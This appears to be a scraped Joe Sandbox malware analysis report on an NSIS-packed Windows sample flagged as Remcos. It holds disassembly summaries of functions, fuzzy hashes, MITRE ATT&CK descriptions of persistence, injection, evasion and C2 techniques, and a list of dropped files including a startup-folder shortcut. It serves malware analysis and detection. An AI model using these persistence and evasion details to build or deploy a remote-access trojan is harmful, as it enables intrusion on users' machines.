Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 00405F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,771B3420,004036EF), ref: 00405F46

Strings

nsa, xrefs: 00405F1A

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KO0q4biYfC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BaConf.ini

C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr

C:\Users\user\AppData\Local\Temp\nsg3ACA.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsv39A0.tmp

C:\Users\user\AppData\Local\Temp\tmc.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skovmandshilsnerne.lnk

C:\Users\user\AppData\Roaming\brugser\brugo\Ildslukkeres.Pen

C:\Users\user\AppData\Roaming\brugser\brugo\Massserne.Raa

C:\Users\user\AppData\Roaming\brugser\brugo\Ornithoscopist180.ker

